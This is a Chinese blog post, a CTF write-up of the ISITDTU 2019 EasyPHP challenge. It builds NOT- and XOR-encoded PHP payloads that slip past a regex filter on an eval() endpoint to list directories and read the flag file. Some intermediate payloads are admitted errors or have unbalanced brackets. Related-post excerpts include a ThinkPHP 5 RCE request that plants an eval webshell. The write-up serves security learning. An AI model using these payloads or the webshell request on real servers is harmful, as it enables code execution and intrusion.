[ISITDTU 2019]EasyPHP rce替换字母

最新推荐文章于 2023-12-13 15:48:25 发布
最新推荐文章于 2023-12-13 15:48:25 发布
阅读量568 收藏
点赞数 1
分类专栏: rce命令执行 文章标签: php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128364182
版权 
<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>

打开界面有两个if

首先要绕过第一个正则,限制了 oxoo-空格的字符 和数字,还有一些字母

然后第二个就是字符的种类不能超过13个

首先第一个用取反,传入?_=(~%8F%97%8F%96%91%99%90)();没反应

这里有一个点,取反=异或%FF

((%8F%97%8F%96%91%99%90)^(%FF%FF%FF%FF%FF%FF%FF))();

这里在注意外面需要加一层括号,(())();

是一样的效果,然后发现出现phpinfo()

<?php
echo urlencode(~"phpinfo");

 ((%8F%97%8F%96%91%99%90)^(%FF%FF%FF%FF%FF%FF%FF))();

 出现phpinfo环境,然后我们利用print_r(scandir(.));显示当前目录,开始构造

((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

 发现太长了然后

<?php
$_="((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));";


echo strlen(count_chars($_,3));
echo "\n";

返回结果是16,我们只要<=13就可以,所以我们需要用已有的字母来构造其中三个字母

print_r     这里ntr用其他字母代替

(scandir(.));

str = 'acdips'
target = 'ntr'
for m in target:
    for a in str:
        for b in str:
            for c in str:
                if ord(a)^ord(b)^ord(c) == ord(m):
                    print("{} = {}^{}^{}".format(m,a,b,c))
//((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

n = c^d^i    %91=%9C^%9B^%8D

 t = c^d^s   %8B=%9C^%9B^%8C

 r = a^c^p   %8D=%9E^%9C^%8F

print_r=(%8F%8D%96%9C%9C%A0%9E)^(%FF%FF%FF%9B%9B%FF%8C)^(%FF%FF%FF%8D%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF);

scandir=

(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%8D%FF%FF%8F)^%FF%FF%FF%FF%FF%FF%FF);

((%8F%8D%96%9C%9C%A0%9E)^(%FF%FF%FF%9B%9B%FF%8C)^(%FF%FF%FF%8D%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%8D%FF%FF%8F)^%FF%FF%FF%FF%FF%FF%FF)) ((%D1)^(%FF)));

上面print的r忘了换,大概思路就这样直接是下面这个

((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));
 

 然后我们就想获得数组的mowei,show_source(end(scandir(.));

或者readfile(end(scandir(.)))相同的道理

((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

获得flag 

偶尔躲躲乌云334
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[ISITDTU 2019]EasyPHP --- rce 超级异或,,,吐了,,,字符之间异或, 成型的异或payload!!!
Zero_Adam的博客
04-06 1433
目录:一、自己做:二、学的的三、学习WP1. 这里先来个不限制字符个数的关于这个%ff 以及异或的事情,咱们好好唠唠1.生成异或中间值的python脚本2. 看有字符限制的时候,:!!干了,,发现了一个更好多python脚本,,接着做题~。 一、自己做: <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) di
【GXUCTF】easy_rce
weixin_51572769的博客
10-10 720
讲一下我的解题过程,期间碰壁无数,值得写(shui)一篇wp~ 首先贴题目地址( http://120.24.194.57:3700/ 页面代码: <?php header("Content-type: text/html; charset=utf-8"); error_reporting(0); highlight_file(__FILE__); # hint:flag在/flag里~ if(isset($_GET['bypass'])){ $bypass = $_GET['bypas
攻防世界高阶之php_rce
uihijio的博客
05-18 7828
打开是thinkphp v5版本 根据版本号查询到有一个远程代码执行漏洞,查看权限 可以产看到PHPinfo 直接写一句话上传上去 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["a"]);?> 用蚁剑连接之后 在主目录下发
[SWPUCTF 2021 新生赛]easyrce
qq_62046696的博客
05-09 3070
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ?url=system("cat /f*"); 2\?url=system("cat /flllllaaaaaaggggggg"); [SWPUCTF 2021 新生赛]easy_sql 打开界面属实给我整不会了。 1.然后测一下是否存在sql漏洞,因为题目中说了参数是wllm,首先输入一下?wll...
[ISITDTU 2019]EasyPHP 异或RCE count_chars() 限制长度 通过 构造存在字符获取减小长度
最新发布
m0_64180167的博客
12-13 466
发现确实是 print_r 为什么我们需要这种格式呢 我们下面来看这个形式。然后这里使用 readline(end(scandir(.))) 即可。我们之前获取到的取反 其实都是通过 ~ 来获取的 所以这里无法体现。成功执行 这里我们 这里过滤了 system等 使用 prin。这里我们发现 需要字符不能超过13个 我们首先看看构造。print_r(scandir(.)) 需要多少个。我们看看是不是我们构造的print_r。我们使用代码输出看看是不是我们需要的。我们将我们的取反进行修改。
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
EasyPHP5-3-14
07-22
资源名称:EasyPHP5-3-14工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
EasyPHP5-2-17
07-22
资源名称:EasyPHP5-2-17工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
PHP开发环境 EasyPHP v5.4.6
11-08
EasyPHP是一个专为PHP语言提供的完整的可执行开发环境。软件包括Apache、MySQL、PHPMyAdmin,你可以使用EasyPHP方便的创建网站和编写Web应用。
EasyPHP.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
CTF 云演LANCTF_2019_easyphp
qq_42385363的博客
07-01 178
使用true来绕过==,即true弱等于任何非0数值,我们就可以使用来绕过,但是这里不能传字符串,是我们需要将true隔开,字符串不能实现,所以这里需要传入数组来实现,即传入[true,true,true,true,true,true,true] ,所以现在我们知道怎么做了,上手,我们进行修改。这里需要注意,我们后面需要php,是因为源码里面进行了拼接 ,前面的$file是我们md5密后的整个文件名(b.php),后面是$name1,也就是文件类型,即后缀,所以要php
ctf题库 web php越权,刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)
weixin_32050033的博客
03-24 599
目录刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)一、涉及知识点1、无数字字母shell2、利用.htaccess上传文件3、绕过open_basedir/disable_function的几种方法刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)题目复现链接:https://buuoj.cn/challenges参考链接:SUCTF-20192019 SUCT...
[ISITDTU 2019]EasyPHP
wjd19980925的博客
06-08 807
[ISITDTU 2019]EasyPHP
buuCTF [ISITDTU 2019]EasyPHP 1
weixin_45642610的博客
08-08 748
buuCTF [ISITDTU 2019]EasyPHP 1 直接代码审计。 第一个if,过preg_match。一般有三种方法:取反绕过,异或绕过,转义绕过。 这里用取反绕过。 第二个if的意思是输入的字符串不重复的字符长度不超过0xd即13。如aaa((bc不重复字符为a(bc长度为4。 尝试phpinfo: ?_=(%ff%ff%ff%ff%ff%ff%ff^%8f%97%8f%96%91%99%90)(); 可以去看看disable_function禁了哪些函数。 附上异或php脚本: &lt
PhpStorm配置debug环境
qq_51907507的博客
09-20 4913
快乐php
【复现】23春云曦开学考核 Writeup
m0_63563528的博客
03-12 317
发现有flag,用cat指令发现被屏蔽了,那换一个more来查看:127.0.0.1|more /flag。然后获取当前数据库名-1'/**/union/**/select/**/database(),2,3#本题是空格绕过的题,首先-1'/**/order/**/by/**/3#查询到列数为3。base编码,base64,base32,base100等各种都有可能。得到了数据表bighacker之后,访问bighacker获取flag。看末尾4个=,不可能是base64,猜测是32,先base32解码。
ctfd连接mysql_LANCTF(In BUAA) 随笔
weixin_36215894的博客
01-26 415
LANCTFLANCTF 是 Lancet 举办的校内 CTF 比赛,出题人包含了绝大多数 Lancet 核心成员。由于面向校内,难度以中等偏下为主。本人咸甚,在比赛中仅承担了 LANCTFd(based on CTFd) 的二次开发与维护、部分(简单) Web 题目出题人,在这里记录一下自出题以来的想法以及比赛期间的维护、交流等内容。WebUnderGroundCity1题目设置题目原型:TWC...
BUUCTF:[ISITDTU 2019]EasyPHP
末初的CSDN博客
04-27 4292
题目地址:BUUCTF:[ISITDTU 2019]EasyPHP Refer: https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/ 思路很简单,绕过这两个if即可任意代码执行 先看一下第一个正则匹配 看不懂的推荐使用这个网站:https://regex101.com/ if ( preg_match('/[\x00- 0-9\'"...
BUUCTF:GYCTF2020/新春战疫Easyphp
末初的CSDN博客
03-29 3107
参考:https://blog.csdn.net/qq_42181428/article/details/104474414?fps=1&locationNum=2 新春战疫原题在BUU上的复现,反序列化配合字符逃逸 源码泄露www,zip PHP反序列化的字符逃逸的原理 PHP在进行反序列化的时候,只要前面的字符串符合反序列化的规则并能成功反序列化,那么将忽略后面多余的字符串 获取f...
攻防世界 easyphp
09-11
EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值